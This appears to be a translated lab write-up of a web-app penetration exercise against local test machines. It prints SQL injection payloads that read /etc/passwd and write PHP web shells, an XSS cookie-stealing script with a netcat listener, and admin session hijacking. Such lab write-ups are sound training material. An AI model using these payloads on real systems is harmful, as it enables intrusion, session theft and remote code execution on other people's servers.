experiment 5

SQLi

Discover possible injection points

 

Attempt to verify injection

according to

http://192.168.35.128/cat.php?id=1' or 1=1%23 An error is found, indicating that there is a non-character injection here

 

http://192.168.35.128/cat.php?id=1 and 1=1 display normally

 

http://192.168.35.128/cat.php?id=1 and 1=2 no display

Explain that there is an injection point here and it is a digital injection

 

 

http://192.168.35.128/cat.php?id=1 normally displayed when order by 4

 

http://192.168.35.128/cat.php?id=1 order by 5 error

 

Explain that there are only 4 fields in the current table

 

Find out what fields are displayed

 

 There are displayed fields as 2

 

get database name

get table name

 

get field name

 

get data

 

Log in to pass the horse in the background, find that filtering php, change it to uppercase and successfully getshell

 

 

 

 

 

 

XSS (no bot can only simulate login manually)

 Find possible XSS vulnerability points

Test for the existence of vulnerabilities

Alert1 pops up successfully, indicating that there is a vulnerability

Write attack code and set monitoring locally

<script>document.write('<img src="http://192.168.243.133/?'+document.cookie+' "/>');</script>

nc -lvnp 80

After the administrator logs in, the administrator's cookie information is obtained

Visit the web page with a cookie (this can be achieved with the console document.cookie="xx"), and successfully log in as an administrator

Then look for injection point

 verify

and 1=1 normal display

and 1=2 no display

Indicates that there is sql injection

order by found 4 fields

Find out the display bits http://192.168.243.135/admin/edit.php?id=2%20and%201=2%20union%20select%201,2,3,4

found that 2 and 3 are display bits

read passwd http://192.168.243.135/admin/edit.php?id=2%20and%201=2%20union%20select%201,2,load_file(%22/etc/passwd%22),4

No echo when reading shadow may be due to insufficient permissions

 

Look for exposed directory information, try to write

http://192.168.179.130/admin/edit.php?id=0%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/classes/test.php%22

404 may be no write permission when accessing

 

Try another directory (there is a css directory in the source code)

 Try to write again, the access found that there is an echo

ok, this directory can be used, basically you can do whatever you want

write command execution 

http://192.168.243.135/admin/edit.php?id=0%20union%20select%201,2,%22%3C?php%20system($_GET[%27a%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/test.php%22

 

write a sentence

http://192.168.243.135/admin/edit.php?id=0%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27a%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/test4.php%22

 successfully get the shell